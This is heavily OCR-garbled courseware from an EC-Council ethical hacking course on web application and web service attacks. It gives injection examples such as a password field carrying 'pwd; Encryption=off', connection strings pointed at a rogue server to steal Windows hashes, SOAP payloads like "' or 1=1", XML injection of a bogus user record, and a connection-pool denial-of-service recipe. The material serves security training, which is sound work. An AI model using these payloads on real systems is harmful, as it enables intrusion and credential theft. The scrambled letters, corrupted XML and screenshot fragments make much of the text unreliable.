Connection String Injection Connection String Parameter Pollution (CSPP) Attacks Connection Pool DoS
J L
_y v_
Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
can
attacks
applications connect to the database instead of abusing database queries. Data Connectivity Attacks Connection String Injection Connection String Parameter Pollution (CSPP) Attacks Connection Pool DoS
Example of a common connection string used to connect to a Microsoft SQL Server database
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
B efo re Injection " D a t a S o u r c e = S e r v e r , P o r t ; N etw o rk Lib rary= D BM SSO C N ; I n i t i a l U s e r ID = U sernam e; P assw o rd = p w d ;" C a ta lo g = D a t a B a s e ;
A fte r Injection " D a t a S o u r c e = S e r v e r , P o r t ; N e tw o rk Lib rary= D BM SSO C N ; I n i t i a l U s e r ID = U sernam e; Passw ord= pw d; E n c r y p t i o n = o f f " C a ta lo g = D a t a B a s e ;
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Initial C a t a l o g = D a t a B a s e ;
After injection The attackers can easily inject parameters just by joining a semicolon (;) character using connection string injection techniques in a delegated authentication environment. In the following example, the user is asked to give a user name and password for creating a connection string. Here the attacker enters the password as "pwd; Encryption=off"; it means that the attacker has voided the encryption system. The resulting connection string becomes:
"Data Source=Server,P o r t ; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off "
W hen the connection string is populated, the encryption value will be added to the previously configured set of parameters.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
r CII < .! ! 1E !1
Attacker tries to connect to the database by using the Web Application System account instead of a user-provided set of credentials
D a ta s o u r c e - S Q L 2 00 5 ; i n i t i a l c a ta lo g d b l; in t e g r a t e d s e c u r it y n o ; u s e r i d ; D a ta S o u rc e Rogue S e r v e r ; P a s s w o rd ; In te g r a te d S e c u r ity t r u e ; D a ta s o u r c e S Q L 2 00 5 ; i n i t i a l c a t a lo g d b l ; i n t e g r a t e d s e c u r i t y n o ; u s e r i d ; D a ta S o u rc e T a r g e t S e r v e r , T a r g e t P o r t 4 4 3 ; Pas s w o rd ; In te g r a te d S e c u r ity t r u e ; D a ta s o u r c e S Q L 2 0 0 5 ; i n i t i a l c a ta lo g d b l / in t e g r a t e d s e c r u r it y n o ; u s e r i d ; D a ta S o u rc e T a rg e t S e rv e r, T a rg e t P o r t ; P a s s w o rd ; I n t e g r a t e d S e c u r it y t r u e ;
Attacker will then sniff Windows credentials (password hashes) when the application tries to connect to R o g u e _S e rv e rwith the Windows credentials it's running on
Copyright by
H ash S tealing
. An attacker replaces the value of data source parameter with that of a Rogue Microsoft SQL Server connected to the Internet running a sniffer:
D a ta so u rce = SQ L2005; in it ia l S e rv e r; c a t a lo g P a ssw o rd = d b l; in t e g r a t e d s e c u r ity = n o ; u ser ID = ;D a t a S o u rce = R o g u e In t e g r a t e d S e c u r it y = t r u e ;
Attackers will then sniff Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it's running on.
P o rt S can n in g
Attacker tries to connect to different ports by changing the value and seeing the error messages obtained.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
D a ta
so u rce
SQ L2005;
in it ia l S e rv e r,
c a t a lo g T a rg e t
d b l;
in t e g r a t e d
s e c u r ity = n o ;
u ser
ID = ;D a t a
S o u rce = T a rg e t
P o rt= 4 4 3 ;
P a ssw o rd = ;
In t e g r a t e d
S e c u r it y = t r u e ;
H ijack in g W eb C re d e n tia ls
Attacker tries to connect to the database by using the W eb Application System account instead of a user-provided set of credentials.
D a ta so u rce = SQ L2005; in it ia l S e rv e r, c a t a lo g T a rg e t = d b l; in t e g r a t e d s e c u r ity = n o ; u ser ID = ;D a t a S o u rce = T a rg e t P o rt; P a ssw o rd = ; In t e g r a t e d
S e c u r it y = t r u e ;
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Crt<fW 4
CEH
ItliK4I Km Im(
Ex a m p le: By default in ASP.NET, the maximum allowed connections in the pool is 100 and tim eout is 30 seconds
&
Thus, an attacker can run 100 m ultiple queries w ith 30+ seconds execution tim e w ithin 30 seconds to cause a connection pool DoS such that no one else w ould be able to use th e database-related parts of the application
Copyright by
large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users. Example: By default, in ASP.NET, the maximum allowed connections in the pool is 100 and timeout is 30 seconds. Thus, an attacker can run 100 multiple queries with 30+ seconds execution time within 30 seconds to cause a connection pool DoS such that no one else would be able to use the database related parts of the application.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
(rtifwtf itfciul lUilwt
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Redirection Attacks
Frame Injection
Session Fixation
ActiveX Attacks
Cross-Site Scripting
Privacy Attacks
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
An attacker bypasses the clients ID's security mechanism and gains the access privileges, and then injects the malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.
t HTTP H ea d er In je c tio n
An attacker splits the HTTP response into multiple responses by injecting a malicious response in HTTP headers. This attack can deface websites, poison the cache, and trigger crosssite scripting.
F ra m e In je c tio n
W hen scripts don't validate their input, codes are injected by the attacker through frames. This affects all the browsers and scripts which doesn't validate untrusted input. These vulnerabilities occur in HTML page with frames. Another reason for this vulnerability is editing of the frames is supported by the web browsers.
user's browser. The attack works by including a link in a page that accesses a site to which the user is authenticated.
Session F ixation
Session fixation helps an attacker to hijack a valid user session. In this attack, the attacker authenticates him or herself with a known session ID and then hijacks the uservalidated session by the knowledge of the used session ID. In a session fixation attack, the attacker tricks the user to access a genuine web server using an existing session ID value.
A ctiveX A ttacks
The attacker lures the victim via email or a link that has been crafted in such a way that the loopholes of remote execution code become accessible. Attackers gain equal
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attack W eb Servers
Copyright
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
A tta c k W eb S e r v ic e s
J
CEH
Web services work atop the legacy web applications, and any attackon web service will immediately expose an underlying application's business and logic vulnerabilities for various attacks
Cl
a v a ila b le
rjf
m e c h a n is m s .
increa se s . T h e a t t a c k e r can e x p l o i t t h o s e v u l n e r a b i l i t i e s t o c o m p r o m i s e t h e w e b se rvices. T h e r e m a y b e m a n y r e a s o n s b e h in d a t t a c k in g w e b se rvices. A c c o r d in g t o t h e p u r p o s e , t h e a t t a c k e r can c h o o s e t h e a t t a c k t o c o m p r o m i s e w e b services. If t h e a t t a c k e r 's i n t e n t i o n is t o s to p a w e b s e rv ic e f r o m s e rv in g i n t e n d e d users, t h e n th e a t t a c k e r can la u n c h a d e n ia l- o f- s e r v ic e a t t a c k by s e n d in g n u m e r o u s r e q u e s ts . V a r io u s t y p e s o f a tta c k s u sed t o a t t a c k w e b se rvice s are: 0 Q SOAP I n je c tio n X M L I n je c tio n W S D L P r o b in g A t ta c k s I n f o r m a t i o n Leakage A p p l i c a t i o n Logic A t ta c k s D a ta b a s e A t ta c k s
EC-C0UnCil
DoS A t ta c k s
Web Services
EC-C0UnCil
Web S e rv ic e s P ro b in g A ttack s
6 In th e fir s t step, th e a ttacke r tra p s th e WSDL d o c u m e n t fro m w e b service tra ffic and analyzes it to d e te rm in e th e p urp o se o f th e a p p lic a tio n , fu n c tio n a l break d o w n , e n try po in ts , and message types 9 These attacks w o rk s im ila r t o SQL in je c tio n attacks
C EH
(artifwd ilhiul lUtbM
A tta cker th e n creates a s e t o f v alid re q u e s ts by selecting a set o f o p e ra tio n s , and fo rm u la tin g th e request messages a ccording to th e rules o f th e XM L Schema th a t can be s u b m itte d t o th e w e b service A tta c k e r uses th e se requests t o in clude m alicious c o n te n ts in SOAP requests and analyzes errors t o gain a deeper und erstanding o f p o te n tia l s ecurity weaknesses
v.-r: u r .
Attacker
<?xm l verslon"I.O - encoding"UTF S ' standalone' no *? > - <$Q A P -E N V : Envelope )(m ln s: SO A PSO K l"http://www.w3.org/2001/ XM Lschem a' xm lns: S0A PSD K 2http ://www .w3 .org/200 l/XMLSchem .o Inst.once" xm lns: S0A PSD K 3"http://schemas .xm lso.op .org/soap/ encoding/' xm lns: S O A P E N V ' http://schemas .xm lsoap .org/soap/ envelope/'> < S O A P -E N VB o d y -< S O A P S D K4: GetProdUctlnform ationByNam e xm lns: S Q A P S D K 4' http://sfaustlap/Productlnfo/>
[<SQAPSDK4; name? ^SQAP3DK4; na m d
<?>o:m l versions" 1, 0 " encoding" utf-8" ? > - <so ap : Envelope xm lns: soap"http://schem as.xm lsoap.org/soap/ envelope/ xm lns: xsi= "http://www .w 3 .org/2001/XMlSchem -instl'lnce " xm lnv xsd='http://www .w 3 .org/20DI/XMLSchemlT> < soap :B o d y> <soap:Fault> <faultcodc>*oap:Scrvcr</faultcode> <faultstring>System .W eb .S ervices.Protocols.S oapException: t r w m i w t i to
procat raquatt -> tyrtam Oata.ClcUbCleOMcaption Syntax rror (miuing operator) n query n n o r produttr\ane Ilk ' and provlderld '112 111 SMI. At tyttem.Oau.OleOb.OieObcoflimandixeciAeCommandTattrrorHanAng IMU hr) t 0 a.OUDb.O(eDtxcm nd l noarteConim ndteirt or}ingleM et tit ItagOSTAftAMS dbParamt. Ot*0 <t* c.oa/teHourt) I lyitcm Oata.OUOb.OlcOOCOmmand ( 0cute(0mmandTe1 t|(Jt>;cct&eao<ut<*(et 1/ t ) M iyM wnM <*<06 Ct<OKomand taacuteCemmand !Command Behavior behavior. abject* exact*eftemit) at Syttem Oata OteOb OleObCo mm and. liKutdte adc1 nterna !(Command Behavior behavior, String mathoc! at Syftem.Oata.OIDb.OleOt)ccn1mand.lxaa<teKeader|Con1mandBehBv1ar behavior) at iyitem Oata.OleOb.O<eObcommand lisa/teKcader() at Product M. froductOBAeceit . Gat Product M armatlon( String productMame. String uld, String pauword) at Prodjetlnfa.ProduclnfoXietProdualnl or mat ion& *Name( String r\a1 e, String !ad, Stnng password - Ind a t inner exctpoon Hack trac </faultstring>
<S 0A P S D K 4: uid>312 111 -8S43</SO APSDK4:uid> <S 0A P S D K 4: passw ord> 5648</SO APSD K 4: passw ord> </S O A P S D K4: G etProduc t Inform a ti 0 nByNam e> </SO A PE N V :B o d y c/SO A PE N V :E nvelope>
Attacker
............<
Attacker inject arbitrary character (') in the input field
<?xm l version1.0" encoding'U TF-S ' standalone no' ? > <SO A P *E N V : Envelope )(m lns: SOAPSOK1- http://www.w3.org/2001/ XM Lschem a' xm lns: SO APSDK2="http ://www .w3 .org/200 l/XMLSchem.o- inst.once" xm lns: S O A PSD K 3="http://schemas .xm lso.op .org/soap/ encoding/' xm lns: SO A PENV http://schemas .xm lsoap .org/soap/ envelope/'* - <SO A P- EN V:B ody> - <S0APSDK4: GetProdUctlnform ationByName xm lns: SO A PSD K 4=' 1 ^ : / ^8051^ ^ 0^1 ^<^ 0/ > kS0APSDK4: nam e> </SO APSDK4: namel <S0A PSD K4: uid>312 - 111 - 8543</SO APSDK4: uid> <SO A P$D K 4: password* 5648</SO AP$DK4: pa39w ord> </SOAPSDK4: GetProduct Inform a tiO nBy Nam e> </S0APEN V: B ody> </SOAPE N V : Envelope*
<?>o:m l version"I, O " encoding" utf-8 " 1> <soap: Envelope xm lns: soap=http://schemas.xmlsoap.org/soap/ envelope/" xm lns: xsi="http://www .w3 .org/2001/XMLSchem~- instl'lnce " xm lns: xsd=http://www .w3 .org/200 l/XMLSchm lT> <soap: B ody> <soap:Fault>
<faultcode>soap:Server</faultcode>
v^A ^unahi.'-o proceu request 1y5t em.Dale.OleOb.CXeObCxteption: Syntax error (mining operator I in query e x p m m productnamelike and providerid -'312 - 111 8543". At sv(tenvData.CMeDb.QleObcommand.Executc(ommandTextErR>rHandling IInt32 hr)at ystem.Data.OleOto.OleOtxx>mrrand .EKecuteCommandTertFot SintfeReiull ItagDSPARAMSdbParams, Objects execi*eKesuft) at t JJata.CH e Db.QIeObcommand f xecutrCorrmand T rat( Ofaject&si rcu t rRuM)at S*t n .Data DfcrO fc 0teCX>Commiod .ExecuteCommind (Command Behavior behavk>f,0b>e<U1 exeuittfteMlOat System Data .oleoh .OleOlHo mm and. fxecutefteoderi ntc ms1(command Behavior beharior, String met hod) at Sy>ten1 .Data.OleOb.QleObconmandCxecuHradn(( anmandRrfiaviot behavior)at 5y*tero.Data.0<e0b.0leDbu>t1v11andExe1u leRtadufl at Pr oduct Info. ProductDSAusm. Get Product infrxmat ionfstrirg p rodiKtName, * > tri nj uld, St ring pavtword) at P'odiKtlnfc.PrududnhxCetProduidnfuimetianByNain^Stringneme.Stting u>d, String peatweid)End 04 inner exception *Mdttrar- </faultstring>
EC-C0lMCil
0 d )
Q Q
h ttp ://ju g g yb o y.co m /w s/p ro d u cts.a sm x
Server Response
<?xml version"1.0 encoding="utf-8' ?> - <so^>: Envelope xmlns: soap=', http://schemas .xmlsoap.org/soap/envelope/" xmlns: xsi 'http://www .w3 . org/2001/XMLSchemainstance' xmlns: xsd'h t t p ://www . w3 .org/2001/XMLSchema '> - <soap:Body> - <GetProductlnformationByNameResponse xmlns"http://juggyboy/ProductInfo/< < GetProductlnformationByNameResult> <productid> 25 < /product!d> <product Name >Paintingl01</productName > <productQuantity>3</productQuantity> <productPrice> 1500</productPrice> </GetProductlnforma tionByNameRe sult> </Ge tPr oductlnfo rma tionByNameRe sponse> </soap: Body> </soap: Envelope>
A c c o u n t L o g in Usernam e Password f % [o n
1.0 ined B 'U T F -0 ' s ta n d a lo n e '# # " ? > < ? u l T r : 10 a pe g a l a s : S0APSDK1h ttp ://w w w w3 o r 9 /2001/X M L Sch - < S 0 A P - W Er.v! a l B i : S0APS0K2 h ttp : //w w w .w 3 .o r 9 /2 0 0 1 / XMLSchwa - i n s t a n c e a ls : S0APSDK3 h t t p : // c h e a a s . x b 1 :o p . o t f / s o t p / i B e e d i o ( / ' u l a i S0APEKV h ttp :/ / :e h c B : llf / iO ip le n v c lo p c l > - <S0AP-DfV Body> - <2QAPSDX4 G tP io d a c tln f o n m tio n B y N fto e a l a : : 2GAPSDK4 ' h t t p : / / j a 99yb y / ^ sodQ ec^ n ^ / '> <S0APSDK4: naae>% </S0APSDK4 : n a ae > <50APSDK4: u1d> 312 - 111 - 854 3</SQAPSDK4 : m d > <S0APSDK4: p a ssw o rd :* ' Or 1= 1 Or blah = 1</S0APS0K4 : p a s </S0APS0K 4 G e tP ro due t i n f o r nation By one :> C/SQAP-EKV Body> </S0A P- DP/ : E n v elo p e*
19
S e rve r Response
G O http://juggyboy.com/ws/products.asmx
Account Login
U s e rn a m e Passw o rd f %
>
<?xml version="l.0" encoding="utf-8' ?> - <soap: Envelope xmlns: soap=' http://schemas .xmlsoap.org/soap/envelope/" xmlns : xsi ='http://www .w3 .org/2001/XMLSchemainstance' xmlns: xsd= http://www . w3 .org/2001/XMLSchema'>
< s o a p :B o d y >
n i n e SOAPSDK2' h t t p : / / w w w . w 3 . o r g / 2 0 0 1 / XMLSchema - i n a t a n c e ' z n l n a : SOAPSDK3' 11t t p : / / i c h e i u s . xm l s o a p . o r g / s o a p / e n c o d i n g / ' r a i n s : SOAPINV 'h t t p : / / * c h e * 1 d s .z ja l8 0 a p . 0 r g / 8 0 a p J e n v e l o p e J r> <S0AP-BN V:B0dy>
-< S 0 A P -B N V :E n velo p ex m ln s : SO A P S D K l-' http://w w w .w 3 .org/2 0 0 l/*M L S ch e1 -< S O A P S D K 4 :O etP ro d t>ctln fo ro tio n B yN n m e
- <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
< G e t P r o d u c t I n f o rm a tio n B y N a m e R e s u it>
n l n s : S0APSDK4' h t t p : / / j u g g y b o y / P r o d u c t l n f o / ' > <SOAPSDK4 naae>% </SOAPSDK4: nnm e> <S0A?SBK4: u ld > 3 1 2 - 1 1 1 - 8543</SO A PSD K 4: u l d > <SOAPSDK4: p a ! s * o r d > ' O r 1 * 1 O r b l a h </SOAPSDK4: p a s s a o r d > < / SOAPSDK 4 : c e tP r o d a c t ln f o r m a tio n l 9 y N a m o > </SOAP ENV:B0dy> <J SOAP BNV : E n v o io p o >
<productid> 25 </productid> <product Name >Paintingl01</productName > <productQuantity>3</productQuantity> <productPrice> 1500</productPrice> </GetProductlnformationByNameResult> < /GetProductlnformationByNameResponse>
< /s o a p : Body>
</coap: Envelope>
EC-C0l1nCil
C EH
Attackers inject XML data and tags into user input fields to manipulate XML schema or populate XML database with bogus entries XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks
Submit
oo
h t t p : / / j 1 J g g y b o y . c o m / w 5 / 1 0 g i n . a 5 m x
Account Login
U sernam e Mark
<us r nMM >ganda 1*</ u sr nam > <pas3word>! a3</password> <userid>101</usrid> <r . a il> g a n d a lf 'r.iddleear th . com</r . a il>
</user>
Password
12345
E-mail ail
A
mark@>certifiedhacker.com</mailx/user> <user> <username>Jason</username> <password>attack</password> <userid>105</useridxmail>jason@>juggyboy.com
J^ u s e r 5
I
<usr> <userna!ne>Mar]c</userna1ne> <p33w0rd>12345</pa33v70rd> < usid> l02< /usrid> <r1ail>gandal3m iddlarth. com</m*il> < /usr>
!
;
<ua*rna.*n#>jason</usrnam*>
</u 1 r!>
<nail>jasonijuggyboy.com</raail>
</us*r>
FIG U RE 1 3 .5 5 : X M L Injection
EC-C0UnCil
CEH
Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service attack or generate logical errors in web service request processing
Attacker q ueries for web services with a grammatically correct SOAP document that contains infinite processing loops resulting in exhaustionof XML parserandCPU resources
Attackers send a payload that is excessively large to consume all systems resources rendering web services inaccessible to other legitimate users
EC-C0UnCil
so a p U I is a o p e n s o u rc e fu n c tio n a l te s tin g t o o l, m a in ly used f o r w e b s e rv ic e te s tin g I t s u p p o rts m u lt ip le p r o to c o ls such as SOAP, REST, HTTP, JMS, AMF, and JDBC A tta c k e r can use th is t o o l t o c a rry o u t w e b s e rv ic e s p r o b in g , SOAP in je c tio n , X M L in je c tio n , and w e b services p arsin g a tta c k s
EC-C0UnCil
1 - 1 m M&
1 v D < 3 *n$ * o
[IPP r o je c ts B 1s a m p le s e r v ic e 3I S a r r p te S tr v ic e S o d i (5 b u y
L R e q u e s t1 R ecuest P rp p e fO e s P ro p erty J 1/alu e R eq u est 1 1 b P, M essao e5ize 277 in co cin g U T F -8 E n cb o irt K ttp V /V v ifV ...
I S a m p lc S c rv icc S o , p B in d n g ' Service Encpwnts \ WSD Conient
' Overvie/v
WS-lConplaxe |
.
l > C_l CD C3
0
xsam ple-ser\ke./.-sd
0 &M e s s a g e s
y 7 buyReque
j p art:
Q port: J CZ bu/Resp< I
C3 buy_fadt I
> / u a d i
, <
3nc A d d re s s o flo v R cdi... tru e Jserane -,a s s v '0'd >xnan A utn cn tica... G lo b a lH TT... /V S S -P a s s ... W 55 rm eT... S S LK cyato fc S lo pS O A P... tnaole M 7 C Wfa ls e rw ceM TO M fa ls e I HireR cep... fa ls e FrtwvlOT .. fa lse bobe jl... (ru e E no xS cA C t... fa ls e F rw rtUnln f*l<# P roperfc # e
*p a rtsp
>" vsdl: 2 ressaaa na!1e="busRespoase< cwsdl.pars naue =i>uyrasuls^ / elenen^= tna :PuyRespoase > m dl :me:3a;e/< vsdl< tn 35ag naT*="Login_fa >"jltM3g v=dl:par<> / " nane="loginFault" type=*xsd:string
i/w s d l .n e s s g e < "> a d l - m i c a g n a n e = " l o g o u t _ f J u ltM g
EC-C0UnCil
C EH
Altova XMLSpy is the XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies
a i a . a 12-, a j 1^ ip iia in ig iB !r ; . g 1 > ft, [^<s- < yB ! y; 0 0& ncyR 3 httpTVivsw'AS orgf20
,WHffiilFb
XSL O u tp u t, h tm t
m/XMLcnerria-1nsia
Ksi:foteach se 1ect="
n1:Firs1Name"> >
nee
xsl scnenraLocation h ttp /x m s 3y. neVag e r c/fschem astoersonn el C:\ eAaencvx$d'>
1<
-PciooraDoio-
span style-'col or: navy: font-fam i l/:Arf l; font size :12pt; font-we1ahtbold;">
I I i i I 1I
A
First Nairn
The
P e rso n n
NiM/FirctName j <lastName
0evgoodf Q 'h * A * n c > 3 A q e n ts
k c J :p p ty -to m p1 3 1 0 /
p!1n>
II I I : I II <
X | V<lu / AUrib
tJ () P e rvjt aDato t ) () l r s r t a n e
0 ( ) -cat'Jorre ra ( ) H e Concert Varabtes
D c c u n rn t
TheAgcm.yR3.xsll Tertiporarr lte$ * Thc.AgcncyR3.x5H Temporary Res_ Th*A{jf>nryR3 *H TMporrvR 1 TheAgencyR3.xsH Im porarv Res! Thc.AgcncyR3.xiH Temporary Re5< v Templates 3nfo Messaoes Trace
Elcniat
O a m e r t
le rf
E to n er*
ElOTtcr* <Fath-Watah
t r a n s f o r m i n g , a n d d e b u g g in g X M L - r e l a t e d t e c h n o lo g ie s . It o f f e r s g r a p h i c a l s c h e m a d e s ig n e r , S m a r t Fix v a l i d a t i o n , a c o d e g e n e r a t o r , file c o n v e r te r s , d e b u g g e rs , p r o file r s , f u ll d a ta b a s e in te g ra tio n , and support fo r WSDL, SOAP, XSLT, X P ath, X Q u e ry , XBRL, and Open XML d o c u m e n t s , p lu s V isu al S t u d io a nd Eclipse p lu g -in s , a nd m o r e .
EC-C0UnCil
I Altova XMLSpy
i i File WSDL Edit Project Tools XML DTD/Schema Help Schema design XSL/XQuery Authentic C onvert
(s J S 1
View Browser W indow
SOAP
ID
IH j0 1 # U
U jB lliB i
I? I r a j f
http :11 w w w .w 3 .org/20 0 1/X M LS chem a-insta nee" x s i:sch e m a L o ca tio n http :/fxm lspy.net/agen cy/sch e m a s/p e rso n n el C:VTheAgency.xsd"> < P e rso na lD a ta > 33 N iki</F irstN a m e > ] < L a stN am e > D evgood</
frn i The Agency R3 C o ntext Name E) <> PersonalData FirstName ) { ! I Type Element Element Text Element Element XPath-W atch Niki Q A g e n ts
xsl:text> </span> xsl:for-each select=" n1:F irstN am e "> s p a n style="color:navy; fontfa m ily:Arial; fontsize:12pt; fo n t-w e ig h t:b o ld ; *> x si:a pp ly-te m p la te s/> 34 - sp an >
The -Personn
F ir s t N a m e :
<f
I I I I I I
Call Stack Name xsl:fo r-e a ch xsl:fo r-e a ch I Location TheAgencyR 3.xslt TheAgencyR 3.xslt TheAgencyR 3.xslt TheAgencyR 3.xslt TheAgencyR 3.xslt Templates In fo Result Document Tem porary Res! /v Tem porary Res! Tem porary Resi Tem porary Res! Tem porary Res! Trace NUM
C o nte xt Step In to
Messages
Ln 5, Col 19
EC-C0UnCil
^M odule Flow
So fa r, w e h a v e discu s sed w e b a p p li c a t i o n c o n c e p ts , t h r e a t s a s s o c ia te d w i t h w e b a p p li c a t i o n , a n d t h e h a c k in g m e t h o d o l o g y . N o w w e w i ll discuss h a c k in g to o ls . T h e se t o o l s h e lp a t ta c k e r s in r e t r i e v i n g s e n s itiv e i n f o r m a t i o n a n d also t o c r a f t a n d se nd m a lic io u s p a c k e ts o r r e q u e s ts t o t h e v i c t i m . W e b a p p li c a t i o n h a c k in g t o o l s a re e s p e c ia lly d e s ig n e d f o r i d e n t i f y i n g t h e v u l n e r a b i l it ie s in t h e w e b a p p li c a t i o n . W i t h t h e h e lp o f th e s e to o ls , t h e a t t a c k e r can e a sily e x p l o i t t h e i d e n t if ie d v u l n e r a b i l it ie s a n d c a r r y o u t w e b a p p l i c a t i o n a tta c k s .
W e b A p p Pen Testin g
W e b A p p C oncepts
S e c u rity Tools
W e b A p p T h re a ts
C o u n te rm e a s u re s
fs=9 S
b
H acking M e th o d o lo g y )
^ -
W e b A p p l i c a t i o n H a c k in g T o o ls
EC-C0UnCil
T his s e c tio n
lists a n d d e s c r ib e s v a r io u s w e b a p p li c a t i o n
h a c k in g t o o l s such as B u r p S u ite
P r o fe s s io n a l, C o o k ie D ig g e r , W e b S c a r a b , a n d so on.
EC-C0UnCil
S o u rc e : h t t p : / / w w w . p o r t s w i g g e r . n e t B u rp S u ite is an i n t e g r a t e d p l a t f o r m f o r p e r f o r m i n g s e c u r it y t e s t i n g o f w e b a p p lic a tio n s . Its v a r io u s t o o l s w o r k t o g e t h e r t o s u p p o r t t h e e n t i r e t e s t i n g p ro ce ss, f r o m in itia l m a p p i n g and a na lys is of an a p p li c a t i o n 's a tta c k s u rfa c e , th ro u g h to fin d in g and e x p lo itin g s e c u r it y v u l n e r a b i l i t i e s . B u rp S u ite c o n t a in s k e y c o m p o n e n t s such as an i n t e r c e p t i n g p r o x y , a p p li c a t i o n a w a r e s p id e r, a d v a n c e d w e b a p p li c a t i o n s c a n n e r, i n t r u d e r t o o l , r e p e a t e r t o o l , s e q u e n c e r t o o l , e tc .
EC-C0UnCil
burp suite free edition v1.4.01 [D urp intruder repeater wmdo* A C oul m fruder rapMlSf MQM decoder ' com parer ' 0f* 0ns spider H erts fec sftow vtg lit *em* lull* pa.icads opons request
0
intruder attack 1
L 21
I target posiions
attack type *nicer 2 paytoadposfrons ill thld-f l.41500402:3>>8 IS Mott: t*4 . 1* .bing. net
target position 1^
erro r 6m e
1 2
com m ent I s *
length 1
.-51.1* HTTP 7 7 7
request
response
Proxy-Connection: keep-alive User-Agent: Hori11* S.0 iVindows 1 J T f .2 ; W O Vi 4 ! Applefebrit/S37.4 KHTHL, like Oeckoi Chroe/::.0. 1 : : 9 .S4 Sfaci/S37.4 Accept: / Petecec: h ttp :// vvv.bia^.co/ u u f 1 set:ch?qablkes(lda<CCC7670 CSC1CD3A9DIEABE2t 3SIn0S75D 12S944FOPHIQFPBA Accept-Encoding: gzip,delat,sdeh
raw paiarr.s headers he! lo r r /th?ld-1.4M7< lS0048::314pld-l. 1 HTTP/1.1 Host: t 3 4 .an.b 1 ng.net Pcoxy-Connection: keep-alive Osec-Agent: B osilU/5.0 <V1n40v3 NT .2 1 V0V4) AppleVebr.lt/S37.4 KHT1L. Ilk Gecko* Chr one/22.0.1229.94 S*farl/S37.4 Accept: /
Mtmr:
http: //m .b in g .c o a / lautges/ search7q-blkes 41 d-*CCC7 70 f SC1CD3A9D:EABESt3 5lFE8575D1:594tr0RH-I0rPBA Accept-Encoding: gsip,de<late,sdeh Accept-Language : en-U3. en; q0 . 8 Accept-Charset: ISO-OOS9-1,utf-0;q-0.7,;q-0.3 <UUW lAtt /lAM
*nnnrn[
1m a*
EC-C0UnCil
C EH
CookieDigger helps identify weak cookie generation and insecure implem entations of session management by web applications
The tool reports on the predictability and entropy of the cookie and whether critical information, such as user nam e and password, are included in the cookie values
jdfn
a b o u tW a r*
http //hotmatl/ http y/ww*.f>otml com/
B a ck
M o d>
http://w ww .m cafee.com
im p le m e n ta tio n
o f session
m anagem ent
is b a se d
EC-C0UnCil
Foundstone | CoohieDigger
Vtated URLs /http//Www gmad com https://accounts google.com/ServiceLoginAuh httpsJ/m e i google com/_/mad-stabc/_/js/man/m_ 1/rt41/ver*X06 1 W Kse4k en /*v*1/amf httpsJ/m M google com/mai/u/OAj 24vtewbsp4verohhl4rv&7 1bn4 httpsJ/m a i google com/mail/u/QAji-2&v1ewbsp4ver0W4fw 8mbn4 httpsV/toai google com/ma!l/u/QAjt24v1ewbsp4ver*ohN4rw8mbn4 https //mad googlecom/ma l/u/Q/'> shva https://mad google com/_/madstafcc/_/j3/man/m_1Jt/rt v'verX lW KEse k en7$v1/a<nf httpsV/mai google com/mail/u/0Aj1*24v1ew6sp4verohN4rw&T1bn4 https://mai google com/ma!l/u/0Ajt2Sv1ewbsp&ver*ohH4rw&7*o4 google com/marf/u/0/'> u1-24v>ew-6sp4ver-ohH4rw&nbr14 https//ma< google com/mad/u/0Aj!4tml4zyc res //!esetup dB/HardMmm htm
; POST Data f_sourceret r ttp %3A%2F%2fmai n .com 2Fnewml./ %2Frt>oxphpJJgfrm*<nai!f_1d*rmatthews4 f _pwdsweetpte
06
http //w w w m com/login venfy php http //m ail n com/newmad/ftemdex php , msgd 4type about blank http //hotm aJ/ http //W ww hotmad com /
User ID
|jg
Password
I*
Back
Nod
EC-C0UnCil
C EH
File View
lools
Help Proxy Manual Request WebServices Spider Extensions SessionID Analysis S c rip te d
F ra g m e n ts
Compare
Tree Selection niters conversation list Url ? (15 http://www.owasp.ora:80/ n banners/ o- n imaaes/ 9 (15 index php/ O Maln_Page o- skins/ Path Host http:flWww owasp org BU /skins/monobook/mam ' / http:fA1 vww.owasp.org 80 /skins/common/IEFixes http://www.owasp.org.80 /skins/common/commo http://www.owasp org 80 /index php/Mam_Page http://www.owasp.org.80l/ Methods GET Status | Sel-Cookie 301 Moved.. 200 OK Status
2DUOK
Comments
GET
Scnpts E
'UUb/UbOT
O fc I
2006/06/23 2006/06/23
GET GET
r e s p o n s e s ) t h a t h a v e passed t h r o u g h W e b S c a r a b .
EC-C0UnCil
W e b S c a ra b Iools Help Proxy Manual Request WebServices Spider Extensions SessionID Analysis Scripted Fragments Fuzzer
File View
Compare
11
a 1
*
